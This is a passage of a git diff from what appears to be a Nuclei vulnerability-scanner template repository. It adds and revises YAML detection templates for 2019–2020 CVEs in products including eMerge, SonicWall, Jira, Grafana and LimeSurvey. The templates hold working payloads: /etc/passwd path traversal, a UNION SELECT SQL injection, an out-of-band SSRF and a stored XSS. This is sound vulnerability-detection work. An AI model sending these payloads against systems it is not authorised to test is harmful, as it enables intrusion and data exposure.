"
- type: word
part: header
words:
diff --git a/cves/2019/CVE-2019-7254.yaml b/cves/2019/CVE-2019-7254.yaml
new file mode 100644
index 0000000000..1cf467a83d
--- /dev/null
+++ b/cves/2019/CVE-2019-7254.yaml
@@ -0,0 +1,25 @@
+id: CVE-2019-7254
+
+info:
+ name: eMerge E3 1.00-06 - Unauthenticated Directory Traversal
+ author: 0x_Akoko
+ severity: high
+ reference: https://www.exploit-db.com/exploits/47616
+ tags: emerge,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?c=../../../../../../etc/passwd%00"
+ - "{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2019/CVE-2019-7256.yaml b/cves/2019/CVE-2019-7256.yaml
index ec68738285..d5fb7ff1cf 100644
--- a/cves/2019/CVE-2019-7256.yaml
+++ b/cves/2019/CVE-2019-7256.yaml
@@ -4,7 +4,8 @@ info:
name: eMerge E3 1.00-06 - Remote Code Execution
author: pikpikcu
severity: critical
- refrence: https://www.exploit-db.com/exploits/47619
+ description: Linear eMerge E3-Series devices allow Command Injections.
+ reference: https://www.exploit-db.com/exploits/47619
tags: cve,cve2019,emerge,rce
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
@@ -38,4 +39,4 @@ requests:
- 200
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
diff --git a/cves/2019/CVE-2019-7481.yaml b/cves/2019/CVE-2019-7481.yaml
new file mode 100644
index 0000000000..8670029549
--- /dev/null
+++ b/cves/2019/CVE-2019-7481.yaml
@@ -0,0 +1,28 @@
+id: CVE-2019-7481
+
+info:
+ name: sonicwall sra 4600 vpn pre-authenticated sql injection
+ author: _darrenmartyn
+ severity: high
+ description: |
+ The SonicWall SRA 4600 VPN appliance suffers a pre-authentication SQL injection vulnerability.
+ reference: |
+ - https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/
+ tags: cve,cve2019,sonicwall,sqli
+
+requests:
+ - raw:
+ - |
+ POST /cgi-bin/supportInstaller HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: identity
+ User-Agent: MSIE
+ Content-Type: application/x-www-form-urlencoded
+
+ fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--
+
+ matchers:
+ - type: word
+ words:
+ - "4220397236"
+ part: body
diff --git a/cves/2019/CVE-2019-7609.yaml b/cves/2019/CVE-2019-7609.yaml
index 683ce7d4fa..a943b165a3 100644
--- a/cves/2019/CVE-2019-7609.yaml
+++ b/cves/2019/CVE-2019-7609.yaml
@@ -4,7 +4,10 @@ info:
name: Kibana Timelion Arbitrary Code Execution
author: dwisiswant0
severity: critical
- reference: https://github.com/mpgn/CVE-2019-7609
+ description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
+ reference: |
+ - https://github.com/mpgn/CVE-2019-7609
+ - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077
tags: cve,cve2019,kibana,rce
# Kibana versions before 5.6.15 and 6.6.1
diff --git a/cves/2019/CVE-2019-8442.yaml b/cves/2019/CVE-2019-8442.yaml
index d2830af746..c1400479b9 100644
--- a/cves/2019/CVE-2019-8442.yaml
+++ b/cves/2019/CVE-2019-8442.yaml
@@ -3,7 +3,9 @@ info:
name: JIRA Directory Traversal
author: Kishore Krishna (siLLyDaddy)
severity: medium
- tags: cve,cve2019,atlassian,jira,traversal
+ description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check.
+ reference: https://jira.atlassian.com/browse/JRASERVER-69241
+ tags: cve,cve2019,atlassian,jira,lfi
requests:
- raw:
diff --git a/cves/2019/CVE-2019-8446.yaml b/cves/2019/CVE-2019-8446.yaml
new file mode 100644
index 0000000000..dbddb27ac5
--- /dev/null
+++ b/cves/2019/CVE-2019-8446.yaml
@@ -0,0 +1,32 @@
+id: CVE-2019-8446
+
+info:
+ name: Jira Improper Authorization
+ description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check.
+ author: dhiyaneshDk
+ severity: medium
+ tags: cve,cve2019,jira
+
+requests:
+ - raw:
+ - |
+ POST /rest/issueNav/1/issueTable HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ Connection: Close
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+ X-Atlassian-Token: no-check
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en-US,en;q=0.9
+
+ {'jql':'project in projectsLeadByUser("{{randstr}}")'}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "the user does not exist"
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/cves/2019/CVE-2019-8449.yaml b/cves/2019/CVE-2019-8449.yaml
index 12feaa8ca6..e1ab720711 100644
--- a/cves/2019/CVE-2019-8449.yaml
+++ b/cves/2019/CVE-2019-8449.yaml
@@ -2,9 +2,12 @@ id: CVE-2019-8449
info:
name: JIRA Unauthenticated Sensitive Information Disclosure
- author: Harsh Bothra
+ author: harshbothra_
severity: medium
- reference: https://www.doyler.net/security-not-included/more-jira-enumeration
+ description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
+ reference: |
+ - https://www.doyler.net/security-not-included/more-jira-enumeration
+ - https://jira.atlassian.com/browse/JRASERVER-69796
tags: cve,cve2019,atlassian,jira
requests:
diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml
index 54a7b11741..7ae7d5a1a4 100644
--- a/cves/2019/CVE-2019-8451.yaml
+++ b/cves/2019/CVE-2019-8451.yaml
@@ -4,29 +4,27 @@ info:
name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource
author: TechbrunchFR
severity: medium
- reference: https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
- tags: cve,cve2019,atlassian,jira,ssrf
-
-# On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important
-# security issue reported in August 2019.
-
-# CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in
-# the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class.
-# An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable
-# Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal
-# network resources.
-# https://twitter.com/benmontour/status/1177250393220239360
-# https://twitter.com/ojensen5115/status/1176569607357730817
+ description: The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.
+ reference: |
+ - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
+ - https://jira.atlassian.com/browse/JRASERVER-69793
+ - https://hackerone.com/reports/713900
+ tags: cve,cve2019,atlassian,jira,ssrf,oob
requests:
- - method: GET
+ - method: POST
path:
- - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com'
+ - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest'
+
+ body: |
+ url=https://{{Hostname}}:443@{{interactsh-url}}
+
headers:
X-Atlassian-token: no-check
+ Content-Type: application/x-www-form-urlencoded
+
matchers:
- type: word
- name: ssrf-response-body
+ part: interactsh_protocol
words:
- - 'This domain is for use in illustrative examples in documents.'
- part: body
+ - "http" # Confirms the HTTP Interaction
diff --git a/cves/2019/CVE-2019-8903.yaml b/cves/2019/CVE-2019-8903.yaml
index a6c4d98ca9..c33deca749 100644
--- a/cves/2019/CVE-2019-8903.yaml
+++ b/cves/2019/CVE-2019-8903.yaml
@@ -1,10 +1,15 @@
id: CVE-2019-8903
info:
- name: Totaljs - Unathenticated Directory Traversal
+ name: Totaljs - Unauthenticated Directory Traversal
author: madrobot
severity: high
- tags: cve,cve2019,totaljs,traversal
+ description: index.js in Total.js Platform before 3.2.3 allows path traversal.
+ reference: |
+ - https://blog.certimetergroup.com/it/articolo/security/total.js-directory-traversal-cve-2019-8903
+ - https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7
+ - https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b
+ tags: cve,cve2019,totaljs,lfi
requests:
- method: GET
diff --git a/cves/2019/CVE-2019-8982.yaml b/cves/2019/CVE-2019-8982.yaml
index b9586a19cd..8af7a5e681 100644
--- a/cves/2019/CVE-2019-8982.yaml
+++ b/cves/2019/CVE-2019-8982.yaml
@@ -3,6 +3,8 @@ info:
name: Wavemaker Studio 6.6 LFI/SSRF
author: madrobot
severity: high
+ description: com/wavemaker/studio/StudioService.java in WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value, leading to disclosure of local files and SSRF.
+ reference: https://www.exploit-db.com/exploits/45158
tags: cve,cve2019,wavemaker,lfi,ssrf
requests:
@@ -16,5 +18,5 @@ requests:
- 200
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
part: body
diff --git a/cves/2019/CVE-2019-9041.yaml b/cves/2019/CVE-2019-9041.yaml
index effaf7e594..dd27fbd870 100644
--- a/cves/2019/CVE-2019-9041.yaml
+++ b/cves/2019/CVE-2019-9041.yaml
@@ -4,7 +4,10 @@ info:
name: ZZZCMS 1.6.1 RCE
author: pikpikcu
severity: high
- reference: https://nvd.nist.gov/vuln/detail/CVE-2019-9041
+ description: An issue was discovered in ZZZCMS zzzphp V1.6.1. In the inc/zzz_template.php file, the parserIfLabel() function's filtering is not strict, resulting in PHP code execution, as demonstrated by the if:assert substring.
+ reference: |
+ - http://www.iwantacve.cn/index.php/archives/118/
+ - https://www.exploit-db.com/exploits/46454/
tags: cve,cve2019,zzzcms,rce
requests:
diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml
new file mode 100644
index 0000000000..5ed8f7c7f0
--- /dev/null
+++ b/cves/2019/CVE-2019-9618.yaml
@@ -0,0 +1,27 @@
+id: CVE-2019-9618
+
+info:
+ name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
+ author: daffainfo
+ severity: high
+ description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
+ reference: |
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
+ - https://seclists.org/fulldisclosure/2019/Mar/26
+ tags: cve,cve2019,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2019/CVE-2019-9670.yaml b/cves/2019/CVE-2019-9670.yaml
index 5785af71d4..fcb6483f59 100644
--- a/cves/2019/CVE-2019-9670.yaml
+++ b/cves/2019/CVE-2019-9670.yaml
@@ -28,5 +28,5 @@ requests:
matchers:
- type: regex
regex:
- - 'root:[x*]:0:0'
+ - 'root:.*:0:0'
part: body
diff --git a/cves/2019/CVE-2019-9733.yaml b/cves/2019/CVE-2019-9733.yaml
index 3ee1143355..6fa7ddce64 100644
--- a/cves/2019/CVE-2019-9733.yaml
+++ b/cves/2019/CVE-2019-9733.yaml
@@ -3,6 +3,11 @@ info:
name: Artifactory Access-Admin Login Bypass
author: akshansh
severity: critical
+ description: An issue was discovered in JFrog Artifactory 6.7.3. By default, the access-admin account is used to reset the password of the admin account in case an administrator gets locked out from the Artifactory console. This is only allowable from a connection directly from localhost, but providing a X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in turn, assume full control of all artifacts and repositories managed by Artifactory.
+ reference: |
+ - http://packetstormsecurity.com/files/152172/JFrog-Artifactory-Administrator-Authentication-Bypass.html
+ - https://www.ciphertechs.com/jfrog-artifactory-advisory/
+ - https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6
tags: cve,cve2019,artifactory
requests:
diff --git a/cves/2019/CVE-2019-9955.yaml b/cves/2019/CVE-2019-9955.yaml
index a81cbe12a0..343916a8fc 100644
--- a/cves/2019/CVE-2019-9955.yaml
+++ b/cves/2019/CVE-2019-9955.yaml
@@ -2,9 +2,16 @@ id: CVE-2019-9955
info:
name: CVE-2019-9955 Zyxel XSS
- author: pd-team
+ author: pdteam
severity: low
tags: cve,cve2019,xss
+ description: On Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, ZyWALL 1100 devices, the security firewall login page is vulnerable to Reflected XSS via the unsanitized 'mp_idx' parameter.
+ reference: |
+ http://packetstormsecurity.com/files/152525/Zyxel-ZyWall-Cross-Site-Scripting.html
+ http://seclists.org/fulldisclosure/2019/Apr/22
+ https://www.exploit-db.com/exploits/46706/
+ https://www.securitymetrics.com/blog/Zyxel-Devices-Vulnerable-Cross-Site-Scripting-Login-page
+ https://www.zyxel.com/support/reflected-cross-site-scripting-vulnerability-of-firewalls.shtml
requests:
- method: GET
diff --git a/cves/2019/CVE-2019-9978.yaml b/cves/2019/CVE-2019-9978.yaml
index d1f7796603..871ea7acfb 100644
--- a/cves/2019/CVE-2019-9978.yaml
+++ b/cves/2019/CVE-2019-9978.yaml
@@ -2,10 +2,11 @@ id: CVE-2019-9978
info:
name: WordPress social-warfare RFI
- author: madrobot & dwisiswant0
+ author: madrobot,dwisiswant0
severity: critical
+ description: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.
reference: https://github.com/mpgn/CVE-2019-9978
- tags: cve,cve2019,wordpress,wp-pluing,ssrf
+ tags: cve,cve2019,wordpress,wp-plugin,ssrf
requests:
- method: GET
diff --git a/cves/2020/CVE-2019-9618.yaml b/cves/2020/CVE-2019-9618.yaml
new file mode 100644
index 0000000000..bc0a6e0e6d
--- /dev/null
+++ b/cves/2020/CVE-2019-9618.yaml
@@ -0,0 +1,26 @@
+id: CVE-2019-9618
+
+info:
+ name: GraceMedia Media Player 1.0 - Local File Inclusion
+ author: 0x_Akoko
+ severity: critical
+ reference: |
+ - https://www.exploit-db.com/exploits/46537
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-9618
+ tags: cve,cve2019,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-0618.yaml b/cves/2020/CVE-2020-0618.yaml
index c7880a7724..fa58f56675 100644
--- a/cves/2020/CVE-2020-0618.yaml
+++ b/cves/2020/CVE-2020-0618.yaml
@@ -3,17 +3,17 @@ id: CVE-2020-0618
info:
name: RCE in SQL Server Reporting Services
author: joeldeleep
+ description: A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability'.
severity: high
- reference: https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
+ reference: |
+ - https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
+ - https://github.com/euphrat1ca/CVE-2020-0618
tags: cve,cve2020,rce
# THIS TEMPLATE IS ONLY FOR DETECTING
# To carry out further attacks, please see reference[1] below.
# This template works by guessing user ID.
- # References:
- # - [1] https://github.com/euphrat1ca/CVE-2020-0618
-
requests:
- method: GET
path:
diff --git a/cves/2020/CVE-2020-10148.yaml b/cves/2020/CVE-2020-10148.yaml
index 2c1438a0e1..e505f4797d 100644
--- a/cves/2020/CVE-2020-10148.yaml
+++ b/cves/2020/CVE-2020-10148.yaml
@@ -19,15 +19,14 @@ requests:
- method: GET
path:
- "{{BaseURL}}/web.config.i18n.ashx?l=nuclei&v=nuclei"
-
- # - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
- # Above path can be used if you are looking to scan for "SWNetPerfMon.db" file.
-
+ # - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
+ # Above path can be used if you are looking to scan for "SWNetPerfMon.db" file.
matchers-condition: and
matchers:
- type: word
words:
- "SolarWinds.Orion.Core."
+ # - "Connection String" # Commented matchers can be used for "SWNetPerfMon.db" file.
part: body
- type: word
@@ -37,13 +36,4 @@ requests:
- type: status
status:
- - 200
-
-# - type: word
-# words:
-# - "Connection String"
-# - "text/plain"
-# part: all
-# condtion: and
-#
-# Commented matchers can be used for "SWNetPerfMon.db" file.
\ No newline at end of file
+ - 200
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-10546.yaml b/cves/2020/CVE-2020-10546.yaml
index 301c599b17..05a39a2e12 100644
--- a/cves/2020/CVE-2020-10546.yaml
+++ b/cves/2020/CVE-2020-10546.yaml
@@ -3,7 +3,10 @@ info:
name: rConfig 3.9.4 SQLi
author: madrobot
severity: high
- reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10546
+ description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicies.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
+ reference: |
+ - https://github.com/theguly/exploits/blob/master/CVE-2020-10546.py
+ - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
tags: cve,cve2020,rconfig,sqli
requests:
diff --git a/cves/2020/CVE-2020-10547.yaml b/cves/2020/CVE-2020-10547.yaml
index fce255d22e..4213adc816 100644
--- a/cves/2020/CVE-2020-10547.yaml
+++ b/cves/2020/CVE-2020-10547.yaml
@@ -3,7 +3,10 @@ info:
name: rConfig 3.9.4 SQLi
author: madrobot
severity: high
- reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10547
+ description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
+ reference:
+ https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py
+ https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
tags: cve,cve2020,rconfig,sqli
requests:
diff --git a/cves/2020/CVE-2020-10548.yaml b/cves/2020/CVE-2020-10548.yaml
index 9b7bf8e2f3..3d8b1c0e7f 100644
--- a/cves/2020/CVE-2020-10548.yaml
+++ b/cves/2020/CVE-2020-10548.yaml
@@ -3,7 +3,10 @@ info:
name: rConfig 3.9.4 SQLi
author: madrobot
severity: high
- reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10548
+ description: rConfig 3.9.4 and previous versions has unauthenticated devices.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
+ reference: |
+ - https://github.com/theguly/exploits/blob/master/CVE-2020-10548.py
+ - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
tags: cve,cve2020,rconfig,sqli
requests:
diff --git a/cves/2020/CVE-2020-10549.yaml b/cves/2020/CVE-2020-10549.yaml
index 58d51f1edc..5165d18e5e 100644
--- a/cves/2020/CVE-2020-10549.yaml
+++ b/cves/2020/CVE-2020-10549.yaml
@@ -3,7 +3,10 @@ info:
name: rConfig 3.9.4 SQLi
author: madrobot
severity: high
- reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10549
+ description: rConfig 3.9.4 and previous versions has unauthenticated snippets.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
+ reference: |
+ - https://github.com/theguly/exploits/blob/master/CVE-2020-10549.py
+ - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
tags: cve,cve2020,rconfig,sqli
requests:
diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml
index 31984b3ccc..10ca5ff7f1 100644
--- a/cves/2020/CVE-2020-11034.yaml
+++ b/cves/2020/CVE-2020-11034.yaml
@@ -4,11 +4,13 @@ info:
name: GLPI v.9.4.6 - Open redirect
author: pikpikcu
severity: low
+ description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6.
+ reference: |
+ - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
+ - https://github.com/glpi-project/glpi/archive/9.4.6.zip
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-11034
tags: cve,cve2020,redirect
- # https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
- # https://github.com/glpi-project/glpi/archive/9.4.6.zip
- # https://nvd.nist.gov/vuln/detail/CVE-2020-11034
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-11110.yaml b/cves/2020/CVE-2020-11110.yaml
new file mode 100644
index 0000000000..9dca17f123
--- /dev/null
+++ b/cves/2020/CVE-2020-11110.yaml
@@ -0,0 +1,48 @@
+id: CVE-2020-11110
+
+info:
+ author: emadshanab
+ severity: medium
+ name: Grafana Unauthenticated Stored XSS
+ description: Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
+ tags: cve,cve2020,xss,grafana
+ reference: |
+ - https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-11110
+requests:
+ - raw:
+ - |
+ POST /api/snapshots HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json, text/plain, */*
+ Accept-Language: en-US,en;q=0.5
+ Referer: {{BaseURL}}
+ content-type: application/json
+ Connection: close
+
+ {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - application/json
+
+ - type: word
+ part: body
+ words:
+ - '"deleteKey":'
+ - '"deleteUrl":'
+ condition: and
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '"url":"([a-z:/0-9A-Z]+)"'
diff --git a/cves/2020/CVE-2020-11455.yaml b/cves/2020/CVE-2020-11455.yaml
new file mode 100644
index 0000000000..d272459b58
--- /dev/null
+++ b/cves/2020/CVE-2020-11455.yaml
@@ -0,0 +1,27 @@
+id: CVE-2020-11455
+
+info:
+ name: LimeSurvey 4.1.11 - Path Traversal
+ author: daffainfo
+ severity: high
+ description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/48297
+ - https://www.cvedetails.com/cve/CVE-2020-11455
+ tags: cve,cve2020,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-1147.yaml b/cves/2020/CVE-2020-1147.yaml
deleted file mode 100644
index 518475c483..0000000000
--- a/cves/2020/CVE-2020-1147.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: CVE-2020-1147
-
-info:
- name: RCE at SharePoint Server (.NET Framework & Visual Studio) detection
- author: dwisiswant0
- severity: critical
- tags: cve,cve2020,sharepoint,iis,rce
-
- # Ref:
- # - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147
- # - https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/_layouts/15/listform.aspx?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "List does not exist"
- - "It may have been deleted by another user"
- part: body
- condition: and
- - type: word
- words:
- - "Microsoft-IIS"
- - "X-SharePointHealthScore"
- - "SharePointError"
- - "SPRequestGuid"
- - "MicrosoftSharePointTeamServices"
- condition: or
- part: header
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-11710.yaml b/cves/2020/CVE-2020-11710.yaml
index 504967a238..f5550ad166 100644
--- a/cves/2020/CVE-2020-11710.yaml
+++ b/cves/2020/CVE-2020-11710.yaml
@@ -4,6 +4,7 @@ info:
name: Kong Admin Rest API Unauth
author: pikpikcu
severity: info
+ description: An issue was discovered in docker-kong (for Kong) through 2.0.3. The admin API port may be accessible on interfaces other than 127.0.0.1.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-11710
tags: cve,cve2020,kong
diff --git a/cves/2020/CVE-2020-11738.yaml b/cves/2020/CVE-2020-11738.yaml
index 13aef4add9..cfbb12b802 100644
--- a/cves/2020/CVE-2020-11738.yaml
+++ b/cves/2020/CVE-2020-11738.yaml
@@ -11,9 +11,8 @@ info:
versions v1.3.24 and v1.3.26, the vulnerability wasn't
present in versions 1.3.22 and before.
- References:
- - https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild
- tags: cve,cve2020,wordpress,wp-plugin,traversal
+ reference: https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild
+ tags: cve,cve2020,wordpress,wp-plugin,lfi
requests:
- method: GET
@@ -34,7 +33,7 @@ requests:
part: header
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
- "define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"
condition: or
part: body
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-11853.yaml b/cves/2020/CVE-2020-11853.yaml
new file mode 100644
index 0000000000..8e2f1ce615
--- /dev/null
+++ b/cves/2020/CVE-2020-11853.yaml
@@ -0,0 +1,32 @@
+id: CVE-2020-11853
+
+info:
+ name: Micro Focus Operation Bridge Manager RCE
+ author: dwisiswant0
+ severity: high
+ reference: http://packetstormsecurity.com/files/161366/Micro-Focus-Operations-Bridge-Manager-Remote-Code-Execution.html
+ description: |
+ This template supports the detection part only.
+
+ UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected,
+ but this template can probably also be used to detect Operations Bridge Manager
+ (containeirized) and Application Performance Management.
+
+ Originated from Metasploit module (#14654).
+ tags: cve,cve2020,opm,rce
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ucmdb-api/connect"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "HttpUcmdbServiceProviderFactoryImpl"
+ - "ServerVersion=11.6.0"
+ part: body
+ condition: and
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-11854.yaml b/cves/2020/CVE-2020-11854.yaml
new file mode 100644
index 0000000000..0f5f1bf477
--- /dev/null
+++ b/cves/2020/CVE-2020-11854.yaml
@@ -0,0 +1,32 @@
+id: CVE-2020-11854
+
+info:
+ name: Micro Focus UCMDB RCE
+ author: dwisiswant0
+ severity: critical
+ reference: http://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.html
+ description: |
+ This template supports the detection part only.
+
+ UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected,
+ but this template can probably also be used to detect Operations Bridge Manager
+ (containeirized) and Application Performance Management.
+
